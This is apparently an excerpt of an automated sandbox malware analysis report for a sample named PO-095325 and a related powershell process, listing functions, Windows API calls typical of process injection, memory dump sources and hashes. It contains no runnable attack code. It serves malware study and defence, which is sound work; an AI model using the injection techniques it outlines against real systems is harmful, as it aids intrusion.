                                                                        • Instruction ID: 1f814bf5c2d86de99859405979f2a576af382d768670b7209336f950ed88738e
                                                                        • Opcode Fuzzy Hash: a14cfe962722561453111e956b2d3caccd8c79c77b935cb2faed00ea1139754d
                                                                        • Instruction Fuzzy Hash: 982128B1C003599FDB10DFAAC881AEEFBF5FF48310F50842AE559A7250D738A541CBA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 028AC9FC Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1253 28ac9fc-28acea4 DuplicateHandle 1255 28acead-28aceca 1253->1255 1256 28acea6-28aceac 1253->1256 1256->1255
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,028ACDD6,?,?,?,?,?), ref: 028ACE97
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2029188556.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_28a0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 6e10fad8066b168a7c016a75d333fa967dcc401a60df18173e1b0903d970ba4d
                                                                        • Instruction ID: 4b84b488904b7b672d355bf4833248bf514aa09bac9543a1809dda68d163da34
                                                                        • Opcode Fuzzy Hash: 6e10fad8066b168a7c016a75d333fa967dcc401a60df18173e1b0903d970ba4d
                                                                        • Instruction Fuzzy Hash: 6321E4B5900248AFDB10CF9AD584AEEFBF9FB48314F14845AE918A7310D378A954CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 028ACE09 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,028ACDD6,?,?,?,?,?), ref: 028ACE97
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2029188556.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_28a0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 14b9637a05c25891af2cf1677fa657c511263e514478885c8cc297d09a498e89
                                                                        • Instruction ID: cf85508c098ad6205c5871783ff83075a47f413e7826612a53b5015ff11f478e
                                                                        • Opcode Fuzzy Hash: 14b9637a05c25891af2cf1677fa657c511263e514478885c8cc297d09a498e89
                                                                        • Instruction Fuzzy Hash: 8421E5B59002089FDB10CF9AD584ADEBBF5EB48310F14841AE918A7210D379A955CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04FBC7A0 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04FBC826
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0
                                                                        • Opcode ID: b7a0889d5e17b2dc8c9bc02297aaeb73b3083e6723cd20f7e50f312027808c2e
                                                                        • Instruction ID: 06c13e83db62a946f2012502d9af09f1dde413e369ac5bc3b63de3bc2621ef74
                                                                        • Opcode Fuzzy Hash: b7a0889d5e17b2dc8c9bc02297aaeb73b3083e6723cd20f7e50f312027808c2e
                                                                        • Instruction Fuzzy Hash: EE2157B1D002099FDB10DFAAC485BEEBBF4FF89314F108429D459A7240D778A945CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04FBC7A8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04FBC826
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0
                                                                        • Opcode ID: 94159f1be24d800c3f01e23782967321dff5e96b1b38c079fd3029fce30e163c
                                                                        • Instruction ID: 29103c7a8ee74f37822c7fb3095cd4a52bcf86eadbd3b0695d51616f4ba2576e
                                                                        • Opcode Fuzzy Hash: 94159f1be24d800c3f01e23782967321dff5e96b1b38c079fd3029fce30e163c
                                                                        • Instruction Fuzzy Hash: 3A2134B1D002098FDB10DFAAC4857EEBBF4EF89314F14842AD459A7240CB78A945CBA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04FBCA30 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04FBCAB0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        • Opcode ID: 43760d2228d3cff6d3cc5c22398acd8d6cea5a8166f04e2593666db2d23da902
                                                                        • Instruction ID: 79a00a9af1c7f1ed198d7a52395fcce4fbf7aeec73a1d5bc03cf36430f5766d8
                                                                        • Opcode Fuzzy Hash: 43760d2228d3cff6d3cc5c22398acd8d6cea5a8166f04e2593666db2d23da902
                                                                        • Instruction Fuzzy Hash: AF2137B1C003499FCB10DFAAC881AEEFBF5FF48310F10842AE559A7250D738A941CBA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04FBC878 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04FBC8EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 3b46472a93ad51d667c491695115001297137100e9e7c7fdf89d18309b501d60
                                                                        • Instruction ID: fa2d092e00e85daf79954c9ab81cc0c5cfe9c6beb27639fed7dacd1155518209
                                                                        • Opcode Fuzzy Hash: 3b46472a93ad51d667c491695115001297137100e9e7c7fdf89d18309b501d60
                                                                        • Instruction Fuzzy Hash: 51115671C002499FDB20DFAAC845AEFBFF5EF88324F108819E519A7250C739A551CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 028A98B0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,028AA7F9,00000800,00000000,00000000), ref: 028AAA0A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2029188556.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_28a0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad
                                                                        • String ID:
                                                                        • API String ID: 1029625771-0
                                                                        • Opcode ID: c1a02357da8eddbe462d4576cfa4ba056a9b4f834bc915dbd58c284e61eb5c67
                                                                        • Instruction ID: 9efacf207365af73b21491f11839e940afd226a9b1278a8570fe76627245761e
                                                                        • Opcode Fuzzy Hash: c1a02357da8eddbe462d4576cfa4ba056a9b4f834bc915dbd58c284e61eb5c67
                                                                        • Instruction Fuzzy Hash: ED1144BA9003089FDB24CF9AC444AEEFBF4EB88314F14802AD519A7600C778A544CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04FBC880 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04FBC8EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 63d5725c2bf75ea8e6045a0eb1499a5c9681ecac509189307780cedaeab66192
                                                                        • Instruction ID: 129fd4f44ba640504efe585b0b0b0b3acccde8f7cf42fbee53c5b53b0622a559
                                                                        • Opcode Fuzzy Hash: 63d5725c2bf75ea8e6045a0eb1499a5c9681ecac509189307780cedaeab66192
                                                                        • Instruction Fuzzy Hash: 0C1137719002499FDB10DFAAC845AEFBFF5EF88324F108419E559A7250C779A550CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04FBC6F0 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: f1ac0d23a8168c0f5e9649772bbda4ab16794e870bf78e5ce90ea82f32f74f34
                                                                        • Instruction ID: 5d6e6397371832daea12556f6094a6b3f6134c88a29ad868758dad203f53087c
                                                                        • Opcode Fuzzy Hash: f1ac0d23a8168c0f5e9649772bbda4ab16794e870bf78e5ce90ea82f32f74f34
                                                                        • Instruction Fuzzy Hash: E71146B5C003498BDB20DFAAC4457EFFBF4EB89314F24841AD519A7240CB39A941CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04FBC6F8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: 785bd8bcc0b149a4e32d09339a020914ed167c9776fc5338b0cf808d431e1d52
                                                                        • Instruction ID: 605c3094a50c49d1c670fc72d9fdfe55bc9dc4c26b69a6367d8e0ba00aa55c9b
                                                                        • Opcode Fuzzy Hash: 785bd8bcc0b149a4e32d09339a020914ed167c9776fc5338b0cf808d431e1d52
                                                                        • Instruction Fuzzy Hash: BB1125B1D002488BDB20DFAAC4457EFFBF5EF89324F20841AD559A7240CB79A945CBA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 028AA718 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 028AA77E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2029188556.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_28a0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: 9cc334f65a9940187406720f614dd779bdf61a502bcfa1783bc2733039bb636c
                                                                        • Instruction ID: dc1242dc931993d21cc3afbd55fedaa75dc8644d28949cc376d0083f897d63f2
                                                                        • Opcode Fuzzy Hash: 9cc334f65a9940187406720f614dd779bdf61a502bcfa1783bc2733039bb636c
                                                                        • Instruction Fuzzy Hash: 27110FB9C003498FDB14CF9AC444A9FFBF9EB88314F10841AD458A7610C379A545CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00C4D01C Relevance: .1, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2028808805.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_c4d000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1cf2bf974e96b60e81e568d959c03dae0e877d5ca76db5dca38b3295072d4dca
                                                                        • Instruction ID: 398ac899c017a30acb466511c6c3a098c96000bda043356d2fe0f93e3d0baa32
                                                                        • Opcode Fuzzy Hash: 1cf2bf974e96b60e81e568d959c03dae0e877d5ca76db5dca38b3295072d4dca
                                                                        • Instruction Fuzzy Hash: 2621F271604204DFCB14EF24D9C4B26BF65FB88314F20C5ADE90A4B396C33AD807CA62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00C4D005 Relevance: .1, Instructions: 62COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2028808805.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_c4d000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1d2347db983d0358d218332e93c8b3f4ada9b4d6f30794ebeaffd5d9303e8d92
                                                                        • Instruction ID: d2cf42a773e9eca5b6db2191da05cd10523f1bd35548061617092bad6cbbb160
                                                                        • Opcode Fuzzy Hash: 1d2347db983d0358d218332e93c8b3f4ada9b4d6f30794ebeaffd5d9303e8d92
                                                                        • Instruction Fuzzy Hash: 73218E755093808FCB02DF24D994715BF71FB46314F28C5EAD8898B2A7C33A980ACB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 028AF5B8 Relevance: .3, Instructions: 315COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2029188556.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_28a0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 665664bcaad16bad497ae971f2f73ea5e70d46db2733aad62ec7469ff3838944
                                                                        • Instruction ID: e6cf79ae17233a5aa410c516a1330202b4da8d2ed9e998b9afd28b0f2210d614
                                                                        • Opcode Fuzzy Hash: 665664bcaad16bad497ae971f2f73ea5e70d46db2733aad62ec7469ff3838944
                                                                        • Instruction Fuzzy Hash: D01296B8C817458AEB10CF25E84C1893BB1B751718FF04A29D2617B6E5DBBC35AACF44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 028ACD3C Relevance: .3, Instructions: 264COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2029188556.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_28a0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ee068dad75d2596ae86c0e7200278edf2bc77d3aee0f53e2f08b20b2237116fe
                                                                        • Instruction ID: f58235e782d26eb4529e232d4b802edddcfb1ab348809f0e90fe5c6ae69a46a2
                                                                        • Opcode Fuzzy Hash: ee068dad75d2596ae86c0e7200278edf2bc77d3aee0f53e2f08b20b2237116fe
                                                                        • Instruction Fuzzy Hash: 91A16C3AE002198FDF15DFA8C89059EB7B2FF85305B15897AE806EB261DF31E915CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 028AF5A8 Relevance: .2, Instructions: 225COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2029188556.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_28a0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 00cd20fc4240a0560a735aa1718047ad2b3a50c67d5a8c76ccfa09b40b625309
                                                                        • Instruction ID: 590885c7f3619123546c1a85faecf94472cf41007d40a6a418ce912b22711a70
                                                                        • Opcode Fuzzy Hash: 00cd20fc4240a0560a735aa1718047ad2b3a50c67d5a8c76ccfa09b40b625309
                                                                        • Instruction Fuzzy Hash: 77C10AB8C817458BEB10CF25E8481897BB1FB95314FB04A29D2617B2D4DBBC35AACF44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04FB35BC Relevance: .1, Instructions: 88COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 14896fccc00d00aceeea70ff1c63f5880459c6e743c8820f14a3ee271fec7ad6
                                                                        • Instruction ID: 9548faec2b0096a598defb5980edac26e0e6536dfcc4f20a906024a953968363
                                                                        • Opcode Fuzzy Hash: 14896fccc00d00aceeea70ff1c63f5880459c6e743c8820f14a3ee271fec7ad6
                                                                        • Instruction Fuzzy Hash: 041121D37E9192CBF3D2387699E70C72762C2A109238AD435CCA94A507581E311FFD32
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04FBCF3F Relevance: .1, Instructions: 73COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8d589c3f732e0bb04b76d2aeedeb2f8d23c83b08e0e2424b85d48e46f3dab722
                                                                        • Instruction ID: 70e77b0171f2d6374e062c26cc7fd536edc84dc95d8ec7693f60e5dc0baf4308
                                                                        • Opcode Fuzzy Hash: 8d589c3f732e0bb04b76d2aeedeb2f8d23c83b08e0e2424b85d48e46f3dab722
                                                                        • Instruction Fuzzy Hash: BE3177B5D016288FEB28CF57C9153DAFAF2AF85305F04C1EAC54CAA254DB750A89CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Executed Functions

                                                                        Function 07481C10 Relevance: 5.6, Strings: 4, Instructions: 583COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2054244020.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7480000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$4']q$4']q
                                                                        • API String ID: 0-1785108022
                                                                        • Opcode ID: c787f9648ece14c70c108466187b3b60f653aa5fb429c4f065ada8c4f10de073
                                                                        • Instruction ID: 2cf6b7ce50a3216f0ac3221454857db338e67abd2166e7f33e6f1442bc78ca9e
                                                                        • Opcode Fuzzy Hash: c787f9648ece14c70c108466187b3b60f653aa5fb429c4f065ada8c4f10de073
                                                                        • Instruction Fuzzy Hash: 891223B170831D8FCB55AA6C88107EFBBA2AFC6314F14846BD605CB791CB31C986C7A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02DE29F0 Relevance: .2, Instructions: 207COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2047219047.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2de0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 563c2ad544edcb29f18449f094ce1a29163c3ab3df8fa75c8ee92971b2214c9c
                                                                        • Instruction ID: d288264e7fe1167fe541ba2358e6b610e4538e0c35155fbc326a722672357d09
                                                                        • Opcode Fuzzy Hash: 563c2ad544edcb29f18449f094ce1a29163c3ab3df8fa75c8ee92971b2214c9c
                                                                        • Instruction Fuzzy Hash: E3918C70A002058FCB15DF58C5D8AAEFBF5FF48310B258569D816AB365C735EC41CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07481BEF Relevance: .1, Instructions: 122COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2054244020.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7480000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a73fc280da07e04e40238306dcf40811c44ee331aab980000473230797ec698f
                                                                        • Instruction ID: 1d8de7301c083048fe3db537cc66706abb9fb47e50f04237cbe678699dee0d71
                                                                        • Opcode Fuzzy Hash: a73fc280da07e04e40238306dcf40811c44ee331aab980000473230797ec698f
                                                                        • Instruction Fuzzy Hash: 8241E2F1A0820DCFCB51AB198540BFE7BE2AF46204F1884AFD8149F751C736D986C7A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02DE4C20 Relevance: .1, Instructions: 111COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2047219047.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2de0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c518f9b1d027a10ab0ebfa30001454fc206c2bcfe632ea8d404122b4c41ceebe
                                                                        • Instruction ID: 80219cf1298dcbed7c82cac79465e5a0c3537b0a68e53054ca8d147bc9a9956f
                                                                        • Opcode Fuzzy Hash: c518f9b1d027a10ab0ebfa30001454fc206c2bcfe632ea8d404122b4c41ceebe
                                                                        • Instruction Fuzzy Hash: 5C41BF70A0A3868FC706DB6CD89459ABFB0FF5634070940DAD485DB393C725EC0ACBA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02DE2B00 Relevance: .1, Instructions: 109COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2047219047.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2de0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 95ade8ed335a2409af6cb496a65dda9919b84a14b75bdb8dccbcb8f308f5ea64
                                                                        • Instruction ID: 3626708f769e99730800c6d4ed657cc0e5d02a340af9d4e1dd5d509dd1761cf6
                                                                        • Opcode Fuzzy Hash: 95ade8ed335a2409af6cb496a65dda9919b84a14b75bdb8dccbcb8f308f5ea64
                                                                        • Instruction Fuzzy Hash: C6413974A005059FCB09DF58C5D8AAAFBB6FF48314B158159D81AAB364C736FC91CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02DE4C10 Relevance: .1, Instructions: 60COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2047219047.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2de0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4ad2df525d183895a0c01ae885d482bf2e8a3e659e0fa4d395983bf52d283c60
                                                                        • Instruction ID: eddd3742a0bc1860d5d0f14be7231339e3c6c138d6383eea0cf89681bfdf7cea
                                                                        • Opcode Fuzzy Hash: 4ad2df525d183895a0c01ae885d482bf2e8a3e659e0fa4d395983bf52d283c60
                                                                        • Instruction Fuzzy Hash: F5210874A056499FCB04DFACD5809AABBB1FF89310B15859AD806EB362C731EC45CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02DE4BD0 Relevance: .1, Instructions: 59COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2047219047.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2de0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fe66c0ef8b0dfb6ade9d492effc0d3dc1022fc7fb09cd1d390f82c5c77f106c2
                                                                        • Instruction ID: fff912c458f1bf787e496101861f93f37c552a66a279b96636b4723f5d16db2a
                                                                        • Opcode Fuzzy Hash: fe66c0ef8b0dfb6ade9d492effc0d3dc1022fc7fb09cd1d390f82c5c77f106c2
                                                                        • Instruction Fuzzy Hash: EA21FC74A046099FCB05DFA8C4909AABBF1FF49310B158595D40AEB361C731EC41CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02DE4BF0 Relevance: .0, Instructions: 48COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2047219047.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2de0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 72ebf075f064d7ae570b451fd545425e87f338b259ef23f5dc7389328728d8ff
                                                                        • Instruction ID: a25e30156c7322fcb53158e37fd50db6f051dc8676c7074b7c62cd879ebe89a3
                                                                        • Opcode Fuzzy Hash: 72ebf075f064d7ae570b451fd545425e87f338b259ef23f5dc7389328728d8ff
                                                                        • Instruction Fuzzy Hash: D4118034B01644CFCB04DFACD590AAABBB1FF89310B05849AC846EB362C735AC05CF61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02BBD01D Relevance: .0, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2046398766.0000000002BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BBD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2bbd000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: df0c8ad1b3047d67221440dbaa22d21ad51cddf9a0e91b04435ec861e1b36910
                                                                        • Instruction ID: 12db6380fe291ad4b957b4b7bf40b3a6adc0b0bba4395c42f74747337d394a9d
                                                                        • Opcode Fuzzy Hash: df0c8ad1b3047d67221440dbaa22d21ad51cddf9a0e91b04435ec861e1b36910
